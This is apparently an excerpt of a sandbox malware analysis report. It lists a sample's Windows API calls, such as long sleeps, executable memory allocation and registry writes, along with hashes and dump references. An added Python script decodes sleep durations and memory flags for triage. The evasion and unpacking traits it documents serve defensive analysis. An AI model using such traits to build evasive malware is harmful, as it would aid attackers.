                                • Opcode Fuzzy Hash: c61255169513443e4db2d932c18a706cd183cd4ada0f5ce52f18c3f24b042259
                                • Instruction Fuzzy Hash: 447170B1E106288BEF34CB14CC59BBAB7B6EB40304F1486E9D649B7280DB795AC5CF45
                                APIs
                                • Sleep.KERNEL32(00001000), ref: 02B6CC41
                                  • Part of subcall function 02B6CB2D: RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 02B6CBB2
                                • Sleep.KERNEL32(00004E20), ref: 02B6CC64
                                • Sleep.KERNEL32(00057E40), ref: 02B6CC7E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                 • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Sleep$EnumValue
                                • String ID:
                                • API String ID: 3027011392-0
                                • Opcode ID: 47fae6bcfff435e465d6667bc3f21d5076a0873e61f70b6cc6218c26bd79df5e
                                • Instruction ID: 75066f9d9870516cea92df6b83eb26634faaa594d25b34898b288a2c401044f8
                                • Opcode Fuzzy Hash: 47fae6bcfff435e465d6667bc3f21d5076a0873e61f70b6cc6218c26bd79df5e
                                • Instruction Fuzzy Hash: ECE092B1980304E7E9003B60BD0EF373A66EB04783F044861F64A5E280DAB99460CA63
                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00D69902
                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00D699B1
                                  • Part of subcall function 00D69BC1: KiUserExceptionDispatcher.NTDLL(?,00D69B69), ref: 00D69BC7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2265442991.0000000000D69000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.2264290428.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000828000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000C69000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000CB5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000CC3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000D28000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000D37000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2265367690.0000000000D64000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2265367690.0000000000D68000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2265442991.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2265490780.0000000000D79000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                Similarity
                                • API ID: AllocCreateDispatcherExceptionMutexUserVirtual
                                • String ID:
                                • API String ID: 979207007-0
                                • Opcode ID: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                • Instruction ID: ce283121968292f5b68b5875ee6a707cd085acd7956b219e98ac12721d2d9e1a
                                • Opcode Fuzzy Hash: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                • Instruction Fuzzy Hash: CBB15975A002898FEF10CF58CD94BA9B7E9FF55300F4C4515DC09AF2A1D776AA80CB6A
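                                 The Sleep record above (Sleep(00001000), Sleep(00004E20), Sleep(00057E40)) and the CreateMutexA/VirtualAlloc record list their arguments as raw hexadecimal, which is what the report's "Contains long sleeps (>= 3 min)" and unpacking signatures key on. The following Python is added here as an example and is not part of the Joe Sandbox report or its IDA plugin: it parses reference lines in this report's format (subcall prefix, Api.MODULE(args), ref: address) and decodes the constants a triager would want to read at a glance: Sleep durations against the 3-minute threshold, VirtualAlloc allocation type and page protection, and MapViewOfFile access flags. The sample lines are copied from this section; the line regex is an assumption about the report's layout, and the flag tables are taken from the Windows SDK headers.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Sample input: API reference lines in the report's own format, copied from the
# Sleep, RegEnumValueA, CreateMutexA/VirtualAlloc and MapViewOfFile records.
SAMPLE_LINES = [
    "• Sleep.KERNEL32(00001000), ref: 02B6CC41",
    "  • Part of subcall function 02B6CB2D: RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 02B6CBB2",
    "• Sleep.KERNEL32(00004E20), ref: 02B6CC64",
    "• Sleep.KERNEL32(00057E40), ref: 02B6CC7E",
    "• CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00D69902",
    "• VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00D699B1",
    "• MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00008000,?,02B63DE7), ref: 02B6F08E",
]

# Line shape assumed from the records in this report: an optional
# "Part of subcall function XXXX:" prefix, then Api.MODULE(args), ref: ADDRESS.
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Flag tables from the Windows SDK headers (winnt.h / memoryapi.h).
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET",
             0x100000: "MEM_TOP_DOWN", 0x20000000: "MEM_LARGE_PAGES"}
PAGE_PROT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
FILE_MAP = {0x1: "FILE_MAP_COPY", 0x2: "FILE_MAP_WRITE", 0x4: "FILE_MAP_READ",
            0x20: "FILE_MAP_EXECUTE"}
LONG_SLEEP_MS = 3 * 60 * 1000  # the report's "long sleeps (>= 3 min)" threshold


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None for "?" or symbolic arguments the sandbox did not resolve
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # enclosing function on a "Part of subcall" line, else None


def parse_line(line: str) -> Optional[ApiCall]:
    """Parse one reference line; return None for lines that are not API references."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = []
    for raw in m.group("args").split(","):
        raw = raw.strip()
        args.append(int(raw, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", raw) else None)
    sub = m.group("sub")
    return ApiCall(m.group("api"), m.group("mod"), args,
                   int(m.group("ref"), 16), int(sub, 16) if sub else None)


def flags_to_names(value: int, table: dict) -> str:
    """Render a bitmask as OR-ed symbolic names, falling back to hex."""
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else hex(value)


def fmt_arg(x: Optional[int]) -> str:
    return "?" if x is None else hex(x)


def decode(call: ApiCall) -> Tuple[str, Optional[str]]:
    """Return (human-readable description, finding-or-None) for the APIs decoded here."""
    a = call.args
    if call.api == "Sleep" and a and a[0] is not None:
        ms = a[0]
        finding = "long sleep" if ms >= LONG_SLEEP_MS else None
        return f"Sleep {ms} ms ({ms / 1000:.0f} s)", finding
    if call.api == "VirtualAlloc" and len(a) >= 4:
        alloc = "?" if a[2] is None else flags_to_names(a[2], MEM_FLAGS)
        prot = "?" if a[3] is None else PAGE_PROT.get(a[3], hex(a[3]))
        finding = "RWX allocation" if a[3] == 0x40 else None
        return f"VirtualAlloc type={alloc} protect={prot}", finding
    if call.api == "MapViewOfFile" and len(a) >= 2 and a[1] is not None:
        return f"MapViewOfFile access={flags_to_names(a[1], FILE_MAP)}", None
    return f"{call.api}({', '.join(fmt_arg(x) for x in a)})", None


def triage(lines: List[str]) -> List[Tuple[ApiCall, str, Optional[str]]]:
    """Decode every API reference line; lines that do not match are skipped."""
    out = []
    for line in lines:
        call = parse_line(line)
        if call is not None:
            out.append((call, *decode(call)))
    return out


def findings(lines: List[str]) -> List[Tuple[str, int, str]]:
    """(api, call-site address, finding) for the calls that trip a rule."""
    return [(c.api, c.ref, f) for c, _, f in triage(lines) if f]


if __name__ == "__main__":
    for call, desc, finding in triage(SAMPLE_LINES):
        tag = f"  <-- {finding}" if finding else ""
        print(f"{call.ref:08X}  {desc}{tag}")
```

                                 Run against the lines in this section it reports the 0x57E40 sleep as 360 s (over the 3-minute threshold) and the VirtualAlloc at 00D699B1 as a MEM_COMMIT|MEM_RESERVE allocation with PAGE_EXECUTE_READWRITE protection; unresolved arguments shown as "?" in the report stay unresolved rather than being guessed.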
                                APIs
                                • GetPrivateProfileStringA.KERNEL32(?,?,00000000,00000000,00000080,?), ref: 02B65A50
                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 02B65AE5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                 • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: PrivateProfileString$Write
                                • String ID:
                                • API String ID: 2948465352-0
                                • Opcode ID: bb41c866433824d0c68b8d6742c49299a253832fa5d1650f9958f9f0e17d49ea
                                • Instruction ID: f739c8a90bd4746eaf5d633c3d862dc7dff796d081ddd6fa55a89530ea714a06
                                • Opcode Fuzzy Hash: bb41c866433824d0c68b8d6742c49299a253832fa5d1650f9958f9f0e17d49ea
                                • Instruction Fuzzy Hash: FF317172D40219EFDF50DB68D848BE6B7B9EB48340F108999F20AAB241DE745AA48F51
                                APIs
                                • GetDriveTypeA.KERNEL32(00000000), ref: 02B6CAF9
                                • RtlExitUserThread.NTDLL(00000000), ref: 02B6CB20
                                  • Part of subcall function 02B6BADD: Sleep.KERNEL32(?,?,?,?,00000000,Function_00013630,02BE0240,000000FF,?,02B6CB1B,00000003,00000000,00000000,00000000), ref: 02B6BB57
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                 • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: DriveExitSleepThreadTypeUser
                                • String ID:
                                • API String ID: 2502588859-0
                                • Opcode ID: 32921475f3dc35e00f19e49f87424f090b0d36d519fa158af43e6b4164d1983a
                                • Instruction ID: ce815aab537e108912746ce1a6245c498f09bc10f796f17673bb2cf966d5abea
                                • Opcode Fuzzy Hash: 32921475f3dc35e00f19e49f87424f090b0d36d519fa158af43e6b4164d1983a
                                • Instruction Fuzzy Hash: 2E1180319402189BDB259B58CC14BEAB7B9EB48B40F0409E9F709AB240DB716A54CF91
                                APIs
                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,?,?,?,02B63DE7), ref: 02B6F067
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00008000,?,02B63DE7), ref: 02B6F08E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                 • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: File$CreateMappingView
                                • String ID:
                                • API String ID: 3452162329-0
                                • Opcode ID: bd9c292beccd62fc0abb3d35beeebeff91f0e86d4eec5c77b02f4a3033e123c6
                                • Instruction ID: 4ee2180dc9ef6948c4a86d81fa795bf4c4ac9055cbdd522e46a63cb1bbf4924e
                                • Opcode Fuzzy Hash: bd9c292beccd62fc0abb3d35beeebeff91f0e86d4eec5c77b02f4a3033e123c6
                                • Instruction Fuzzy Hash: AE019674A40208EBDB14CF84DA45F59B7B5FB48714F348688FA096B3C1C7B5AE41DB44
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,00015000), ref: 02B6D59D
                                  • Part of subcall function 02B67C71: MapViewOfFile.KERNEL32(?,00000006,00000000,00000000,00015400), ref: 02B67CA8
                                • GlobalFree.KERNELBASE(?), ref: 02B6D5E5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                 • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Global$AllocFileFreeView
                                • String ID:
                                • API String ID: 3692339905-0
                                • Opcode ID: 4f28a2df2c7206a17fd28089550788b2834aac4aa5714aa7fdb83b4173017d98
                                • Instruction ID: d034ae3e039a093a3eeccf124f4341b615384c83888ee0128cb4710a0e933998
                                • Opcode Fuzzy Hash: 4f28a2df2c7206a17fd28089550788b2834aac4aa5714aa7fdb83b4173017d98
                                • Instruction Fuzzy Hash: D831A0B0E40305ABEB00EB94DC49BE977B5FB49724F044698F819BB380E7B95910CB66
                                APIs
                                • RegSetValueExA.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 02B61AA5
                                • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 02B61AD4
                                • RegCloseKey.KERNEL32(?), ref: 02B61AE6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                 • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Value$Close
                                • String ID:
                                • API String ID: 3391052094-0
                                • Opcode ID: 63af85517c312277ce55d94fd0e4ccc76f8a4f11135ed8072412d939274c6eef
                                • Instruction ID: cb50f2769446cec8e702903628ee9bb8da391e694a906365a51248b83282ebd3
                                • Opcode Fuzzy Hash: 63af85517c312277ce55d94fd0e4ccc76f8a4f11135ed8072412d939274c6eef
                                • Instruction Fuzzy Hash: 8E31F6B4D50118EFCB18DF18C849AE9B7B5AB58341F0485D8EB6EAB340D7359E91CFA0
                                APIs
                                • RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 02B6CBB2
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                 • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: EnumValue
                                • String ID:
                                • API String ID: 2814608202-0
                                • Opcode ID: 57b6e879d2b2355a640d12e34a793e1fff2d8d81a5a7f9d0d72108f66a189a4d
                                • Instruction ID: 8165775619f37745c115f93a985f7a887a047d212d3a2f9ace77f4cab33c8ab8
                                • Opcode Fuzzy Hash: 57b6e879d2b2355a640d12e34a793e1fff2d8d81a5a7f9d0d72108f66a189a4d
                                • Instruction Fuzzy Hash: 93218171D0021CEBDB20DB64CC89BE9BB79EB18700F0049D9E289AB181D7F85AC4CF90
                                APIs
                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004), ref: 02B6FC06
                                • RegCloseKey.KERNEL32(00000000), ref: 02B6FCD5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                 • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: CloseQueryValue
                                • String ID:
                                • API String ID: 3356406503-0
                                • Opcode ID: 677bb57565dc0406413e617f0e73fa3fee1b762aba5ed5dd21dafc710f938241
                                • Instruction ID: 3750e55f822cc0910b1d899f8c247d23e61411f42f1cba12d0d5ef2324a5e536
                                • Opcode Fuzzy Hash: 677bb57565dc0406413e617f0e73fa3fee1b762aba5ed5dd21dafc710f938241
                                • Instruction Fuzzy Hash: 5B11D771D41228EBDB24DF94ED8CBE9B7B5AB48304F1445D9E10AA6240C7B89BC4CF55
                                APIs
                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004), ref: 02B6FC06
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                 • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: QueryValue
                                • String ID:
                                • API String ID: 3660427363-0
                                • Opcode ID: 997551ed1144cc253592e199200a1056f7e49b328e7237d2ea6919b830699af8
                                • Instruction ID: 1bc47307727b24a086a9feaee18d9fcc40af3cb91d203c45e40c8e06f954dd73
                                • Opcode Fuzzy Hash: 997551ed1144cc253592e199200a1056f7e49b328e7237d2ea6919b830699af8
                                • Instruction Fuzzy Hash: 7F01DAB1D41128ABDB24DB94EC8DBE9B7B9BB48304F1445C8E10AA6241C7B49BD4CF94
                                APIs
                                • MapViewOfFile.KERNEL32(?,00000006,00000000,00000000,00015400), ref: 02B67CA8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                 • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: FileView
                                • String ID:
                                • API String ID: 3314676101-0
                                • Opcode ID: 04e4a3146d183f692b52714b261ac81ce86f1cf94f7a20e0254c36310a7e592d
                                • Instruction ID: b3cd75486a98a555d3eba12b1c3687a784d82fd37672cdc18ea1d172140c355f
                                • Opcode Fuzzy Hash: 04e4a3146d183f692b52714b261ac81ce86f1cf94f7a20e0254c36310a7e592d
                                • Instruction Fuzzy Hash: 56F08C70D41308EBDB10DBA4E989BDDB778E704349F204584F5086B2C0D7B55A94DB40
                                APIs
                                • RegSetValueExA.KERNEL32(00000000,00000000,00000000,00000004,00000000,00000004), ref: 02B6FB14
                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004), ref: 02B6FC06
                                • RegCloseKey.KERNEL32(00000000), ref: 02B6FCD5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                 • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Value$CloseQuery
                                • String ID:
                                • API String ID: 1795622825-0
                                • Opcode ID: 27251d9f16712799c4d635831c1f60135dbabfc2adf0e74510172104c4a49040
                                • Instruction ID: 30867cc35cf41eaacd2159ebbc39aefa097e10c7c28fc5b87bf006971318c293
                                • Opcode Fuzzy Hash: 27251d9f16712799c4d635831c1f60135dbabfc2adf0e74510172104c4a49040
                                • Instruction Fuzzy Hash: CD01A431A01119DBCB24DB88F99C7B9B3B1FB48315F1486E9D40AA7651C7399E81CF54
                                APIs
                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 02B6D257
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                 • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: ChangeCloseFindNotification
                                • String ID:
                                • API String ID: 2591292051-0
                                • Opcode ID: e25673c02f0a1db50fdea2dfe117749cc66eca0044a94a6f09503eeb5ffb2593
                                • Instruction ID: c3f875a92980f9f70fc136f5dd77d14ff2e4e9b5c7fdf0735b7caf5fe12c32b4
                                • Opcode Fuzzy Hash: e25673c02f0a1db50fdea2dfe117749cc66eca0044a94a6f09503eeb5ffb2593
                                • Instruction Fuzzy Hash: FAF03C79E00258CBDF249BA4D80C7EDB770FB48325F008AD9E559A7280C7B889D4CF11
                                APIs
                                • KiUserExceptionDispatcher.NTDLL(?,00D69B69), ref: 00D69BC7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2265442991.0000000000D69000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.2264290428.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000828000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000C69000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000CB5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000CC3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000D28000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000D37000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2264312389.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2265367690.0000000000D64000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2265367690.0000000000D68000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2265442991.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2265490780.0000000000D79000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                Similarity
                                • API ID: DispatcherExceptionUser
                                • String ID:
                                • API String ID: 6842923-0
                                • Opcode ID: b28eeaae62f6e23880d25c289dfa0cc529f8748fb4b8a3ea378fa927efa10cda
                                • Instruction ID: 72eb4c1778c320bc3f8f64b12a78de39a2936dbecb6e63a2fb649cfd8f132e56
                                • Opcode Fuzzy Hash: b28eeaae62f6e23880d25c289dfa0cc529f8748fb4b8a3ea378fa927efa10cda
                                • Instruction Fuzzy Hash: 99D0A9B42002448FEF508F388848438BAE9EF89320B15457CE8CAEB361E7749D40DB02
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                 • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: 170012852555bfad279a2d99c81e35ce5f517589d6c1888531b389c394a3fbf9
                                • Instruction ID: 9cc685ade7340415ff6167af1d90aefefb5114ca1992299e7b8fe74876add694
                                • Opcode Fuzzy Hash: 170012852555bfad279a2d99c81e35ce5f517589d6c1888531b389c394a3fbf9
                                • Instruction Fuzzy Hash: 645131B5D90304EFDB20EFA4E94DB793775E708382F544D98E50AAB280D7B855A8CF21
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                 • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: b66fff17147692a7c2235798a7c4b120bb7d2b97a896f6e55f9c9415db4798f1
                                • Instruction ID: 39554909988afb32e74e1c8d11c350754b7fad9928a8b257f68c2ff7608c5795
                                • Opcode Fuzzy Hash: b66fff17147692a7c2235798a7c4b120bb7d2b97a896f6e55f9c9415db4798f1
                                • Instruction Fuzzy Hash: 6E118EB0E006158BEB74CB00CE497BA7776FB90308F1485F8C649A7644EB798AC5CF08
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                 • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: 4868feb87eae5aabbdfe50750ef5e68b8db4ce9c3dea5de9e2386ee71836d15c
                                • Instruction ID: 9237120b5db0f0a85100d70ed9acffb8e946a7d8179c24fff617e92b780c052a
                                • Opcode Fuzzy Hash: 4868feb87eae5aabbdfe50750ef5e68b8db4ce9c3dea5de9e2386ee71836d15c
                                • Instruction Fuzzy Hash: 7B016270A55208EBEB04EFC8ED08B7E7B75EB01745F104494EA096B380C7B99BA0DB51
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                 • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: d50d37f2fe75fc7041d68242cf1522afe6a84aada7a265c4460afc643d8018fa
                                • Instruction ID: 8fff98364ba5dbbfe14e82d7e04dee0dd8ae32601a97677a1245d754a5b4a5e6
                                • Opcode Fuzzy Hash: d50d37f2fe75fc7041d68242cf1522afe6a84aada7a265c4460afc643d8018fa
                                • Instruction Fuzzy Hash: D5F05876E8030ACBEF249F84D8097BDB770FB0432AF0406A9EA25AB680C7791591CF41
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                 • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: a67a8887f22ea836c709b6dd577452cbf09a2f4461d24eae696bea483b864857
                                • Instruction ID: a2c5a623ecef362002ef2e9653b51179f560d4bf5bb9fe5bf14e5c90ba3aea92
                                • Opcode Fuzzy Hash: a67a8887f22ea836c709b6dd577452cbf09a2f4461d24eae696bea483b864857
                                • Instruction Fuzzy Hash: 29E086B2E40608CFCB24DFA4E8097ADB7B0FB48325F400AA9EB19A72C0D7350450CB55
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
